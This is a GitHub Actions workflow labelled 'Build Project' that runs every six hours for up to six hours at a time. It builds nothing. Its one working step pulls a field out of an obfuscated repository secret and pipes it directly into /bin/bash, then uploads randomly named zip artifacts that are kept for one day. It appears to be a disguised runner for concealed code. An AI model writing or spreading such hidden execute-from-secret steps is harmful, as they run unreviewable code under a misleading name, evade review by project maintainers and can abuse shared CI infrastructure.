name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '21 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          g81: ${{ secrets.g81 }}
        run: |
          printf '%s' "$g81" | jq -r .fgh51155 | /bin/bash
          echo $ctsk4 | jq -r .uqgd995 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: lccQMJsg
          path: "*.zip"
          retention-days: 1
